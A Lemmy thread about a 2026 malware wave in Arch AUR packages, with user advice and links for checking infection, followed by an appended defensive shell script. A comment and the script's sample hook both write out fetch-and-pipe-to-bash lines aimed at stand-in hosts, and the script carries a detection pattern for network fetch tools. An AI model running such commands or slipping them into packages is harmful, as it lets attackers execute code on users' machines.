this post was submitted on 12 Jun 2026
216 points (99.5% liked)

Linux
[–] dream_weasel@sh.itjust.works 19 points 13 hours ago (1 children)

Ah yes, review the PKGBUILD for every AUR update. Luckily I do this while I'm rereading the ToS every time those get changed for all my software as well.

When I finish that I intend to read the changelog in git for each of the commits since the last update.

[–] FiniteBanjo@programming.dev 6 points 7 hours ago

I always check with my contract lawyer before installing or updating from the AUR. It's worth it for me.

[–] GandalfDG@beehaw.org 2 points 8 hours ago (1 children)

yikes, I'm glad I decided to switch to debian stable recently, not that it's a foolproof system either

[–] FiniteBanjo@programming.dev 2 points 7 hours ago

Yeah, it seems like these sorts of problems aren't necessarily due to an insecure system like the AUR but more so because of the target's publicity and popularity, which is definitely the case with the rise of CachyOS.

[–] brucethemoose@lemmy.world 11 points 14 hours ago* (last edited 14 hours ago) (2 children)

Here's an incomplete list:

https://gr.ht/aur_pkg_list.txt

I know some on Lemmy here use the RuneScape launcher.

[–] mal3oon@lemmy.world 4 points 5 hours ago (1 children)

For an automated script to help you check, you can use https://github.com/lenucksi/aur-malware-check to see if you're infected.

[–] brucethemoose@lemmy.world 2 points 4 hours ago* (last edited 4 hours ago) (1 children)

Very useful, thanks.

Came up clear, fortunately.

Out of curiosity, did Arch send any notifications through pacman or anything? The first I heard of this was on Lemmy.

[–] YellowParenti@lemmy.wtf 1 points 3 hours ago (1 children)

on archlinux.org

I haven't seen anything through pacman though

[–] brucethemoose@lemmy.world 2 points 3 hours ago* (last edited 3 hours ago)

Yeah…

I'm just thinking: if I was just doing my usual Linux things, and happened to not be on a Lemmy binge, I wouldn't have seen this. I barely missed it, but could have been infected and had no idea.

[–] FiniteBanjo@programming.dev 1 points 7 hours ago

I miss the browser, but luckily I haven't played RS since the new CEO cancelled new Pride Events right after the Trump Admin was reelected.

[–] kboy101222@sh.itjust.works 40 points 20 hours ago (1 children)

God, even the Arch malware uses npm as a vector. And thus, my hatred of npm deepens even further

[–] ugjka@lemmy.ugjka.net 9 points 15 hours ago (1 children)

Tbf, it is run in the package's post-install section, so it could be anything, even the typical "curl malware.om | bash". There is a new wave of attacks now pulling things in with Bun, which I guess is a similar thing to NPM.

[–] kboy101222@sh.itjust.works 11 points 15 hours ago

I'm just a web guy who's tired of installing 10 xetabytes of 2-line libraries every time I wanna check out anything web related.

[–] Solemarc@lemmy.world 12 points 16 hours ago (3 children)

Hilarious that it's JavaScript again; truly npm, pypi and cargo are obvious targets. Also, guys, minimise your usage of the AUR! I don't use any AUR packages.

Core > Extra > flathub >>>>>>>>>>>>> AUR

Not that core/extra/flathub can't be pwned, but it's harder than the AUR.

[–] unglueclass23@programming.dev 2 points 12 hours ago (1 children)

I'm interested why flathub > AUR? I try to minimize AUR usage but always assumed it's better than flathub?

[–] KianaTabion@lemmy.today 5 points 9 hours ago

Not the one you asked, but it's a case of priorities:

  • If you want it to just work, then the AUR is probably the better pick. Don't get me wrong, though; most flatpaks should (mostly) work like how you'd expect them to behave natively.
  • But, (Op)Sec-wise, the verified flatpaks win. No contest. Simply because there's no third party involved in the process. (And I haven't even gone over flatpaks' superior sandboxing.)
[–] Mio@feddit.nu 25 points 22 hours ago (5 children)

What can be done to prevent this from happening to the AUR?

[–] teawrecks@sopuli.xyz 3 points 6 hours ago

The AUR is unsafe by design. It's not intended to be something you just install from willy-nilly. It's intended to be a helpful way for arch users who know what they're doing to exchange a convenient way to install arbitrary packages. But you should always be just as wary of it as copy/pasting shell code from a random person on the internet.

[–] excel@lemming.megumin.org 15 points 15 hours ago (1 children)

The way to prevent it is to get more stuff into the official repos so people aren’t forced to rely on AUR in the first place.

[–] 1984@lemmy.today 1 points 11 hours ago* (last edited 11 hours ago)

It depends. There are trusted well known packages and those can be trusted in my opinion. But I wouldn't install any random package someone made.

And how would moving the packages into official repo solve anything? The reason it's in the AUR is because the arch maintainers don't have time to maintain packages.

[–] iltg@sh.itjust.works 9 points 16 hours ago (1 children)

in theory? getting rid of paru and friends, manually reviewing the pkgbuild and the source of whatever it is installing

realistically? nothing. the AUR is a glorified repository of build scripts anyone can upload. the script or the package itself can ship malware

the AUR is mostly the same as downloading and running random exes on windows. you should avoid it, make it as manual as possible (forcing you to double check what's happening) and be able to review the installer/package or trust someone who can vouch for its safety

[–] Bananskal@nord.pub 2 points 6 hours ago* (last edited 6 hours ago) (2 children)

paru shows you the PKGBUILD diffs on upgrade, so you can review them and deny upgrades.

But realistically I am not going to go into the code itself on my installed packages to check for malware or other types of attacks. That's too time consuming for my risk level, and requires more knowledge than can be expected, to be honest.

Edit: but maybe you're talking about when first installing a package? Come to think of it, I'm not sure it shows the PKGBUILD at that point. 🤔

[–] iltg@sh.itjust.works 1 points 1 hour ago

the diff is noise in the potentially big update log. the point of doing it manually is forcing you to take your time and verify stuff one by one. also the pkgbuild is just one place: seeing the hash changed means nothing if you don't check what that archive contains, and seeing the install steps don't change means very little when the installer invokes other scripts anyway

i understand that you aren't going to vet the source itself, but at that point you are exposing yourself to this kind of malware without mitigation. the aur is unsafe by design (fast way to publish a package without any involvement from anyone else) and should be avoided whenever possible. i'm not an arch hater, i too run arch

[–] nlgranger@lemmy.world 1 points 5 hours ago

It does, the diff shows the full files.

[–] Feyd@programming.dev 45 points 22 hours ago (7 children)

The AUR is kind of a trap. It can be useful but it has the warnings it has for a reason. Maintainers are not vetted so you depend on them both to be benevolent and competent and neither are reliable.

No one should really use it without taking the time to understand PKGBUILDs, but you have people recommending AUR helpers like yay and tying AUR updates to regular system updates, which is a terrible idea.

[–] victorz@lemmy.world 7 points 19 hours ago

paru always shows you the diff of the PKGBUILD on upgrade, so no need to worry about adding it to an alias that does both.

In fact, just running paru is the same as running

pacman -Syu
paru -Sau

At the end I review the PKGBUILDs and make sure everything looks reasonable. Usually it's just new source hashes, but not every time.

[–] oce@jlai.lu 22 points 1 day ago (1 children)

Trying to escape surveillance capitalism while installing aur packages willy-nilly.

[–] FiniteBanjo@programming.dev 15 points 22 hours ago (3 children)

Are you one of the malicious actors? That's some shit I'd expect to hear from the people doing this, trying to justify the attack by blaming the users for "capitalism".

[–] oce@jlai.lu 8 points 13 hours ago (1 children)

I am quite confused by your assumptions. I am just making a joke about people trying to avoid surveillance capitalism tools on one side and gleefully installing aur packages from random people on the other side, potentially making their surveillance exposure worse. I'm part of them sometimes because it's too hard to verify everything every time.

[–] FiniteBanjo@programming.dev 1 points 9 hours ago

I tend to be a little antsy around anti-capitalists. Too many bad run-ins with Tankies.

[–] iltg@sh.itjust.works 5 points 16 hours ago

i can empathize with those infected but it's important to note that the source of this issue is still installing random stuff from random people. the aur is not the same as arch repos, and users wanting to opt in need to take more precautions than usual

[–] FiniteBanjo@programming.dev 17 points 1 day ago* (last edited 22 hours ago) (8 children)

~~Users can check if they're already compromised with pacman -Q | grep alvr I think maybe?~~ EDIT: No, sorry, alvr was just one of countless affected packages. Also, several is an understatement since a huge number of packages are affected.

Post with more information here: https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/

[–] TheDuke@europe.pub 4 points 14 hours ago (1 children)

Oh my, I'm new to Linux and I use CachyOS for my gaming rig at home. Most of the time I have no idea what I'm doing, but shit runs well and I'm happy about it. But how the hell do I check my noob ass if it's compromised?!

[–] FiniteBanjo@programming.dev 1 points 8 hours ago* (last edited 8 hours ago)

I'm not real clear on if this is the case but you could try:

  1. Have you installed or updated from the AUR before, such as with Yay? Specifically after June 5th? If so, check this list or the post above for a list of compromised packages. https://gr.ht/aur_pkg_list.txt

  2. Maybe pacman -Q | grep atomic-lockfile because that appears to be what the threat actor is installing but I'm not really sure if that's how it works...?

EDIT: If you really want to play it safe then you could try yay -R $(pacman -Qmq) to remove every aur package and wait out the storm, just be careful to backup important files.
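
An added example, not code from the thread or from any project named in it: a POSIX sh script covering the two checks discussed above, cross-referencing installed foreign packages (what `pacman -Qmq` lists) against a published list of affected package names, and flagging install-time network fetches or package-manager calls in a package's .install hooks, since that post-install section is where such code runs. The package names and .install text below are constructed samples; the pattern list in `scan_install_hooks` is a starting point, not a complete signature.

```shell
#!/bin/sh
# Added example, not from the thread. Sample data below is constructed; real
# input would come from `pacman -Qmq` and the package's .install / PKGBUILD.

# find_affected INSTALLED_LIST AFFECTED_LIST
# Prints each installed foreign package name that also appears in the affected list.
find_affected() {
    printf '%s\n' "$1" | while IFS= read -r pkg; do
        [ -n "$pkg" ] || continue
        if printf '%s\n' "$2" | grep -qxF -- "$pkg"; then
            printf '%s\n' "$pkg"
        fi
    done
}

# scan_install_hooks INSTALL_TEXT
# Prints lines inside pre/post install or upgrade hooks that reach out to the
# network or invoke a runtime package manager; these hooks run as root at install time.
scan_install_hooks() {
    printf '%s\n' "$1" | awk '
        /^(pre|post)_(install|upgrade)[ \t]*\(\)/ { hook=$1; sub(/\(.*/, "", hook); inhook=1; next }
        inhook && /^}/ { inhook=0; next }
        inhook && /(curl|wget|npm|bun|pip|git clone)/ { print hook ": " $0 }
    '
}

# Constructed sample data (not real package lists or a real .install file).
INSTALLED_FOREIGN='alvr
yay
zoom'
AFFECTED_LIST='alvr
example-affected-pkg'
SAMPLE_INSTALL='post_install() {
    update-desktop-database -q
    curl -fsSL https://example.invalid/setup.sh | bash
    bun install -g example-pkg
}
post_upgrade() {
    post_install
}'

find_affected "$INSTALLED_FOREIGN" "$AFFECTED_LIST"
scan_install_hooks "$SAMPLE_INSTALL"
```

On a real system, feed `find_affected` the output of `pacman -Qmq` and the published list, and run `scan_install_hooks` over each foreign package's .install file (and any scripts the PKGBUILD itself runs) before trusting a hit-free result.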
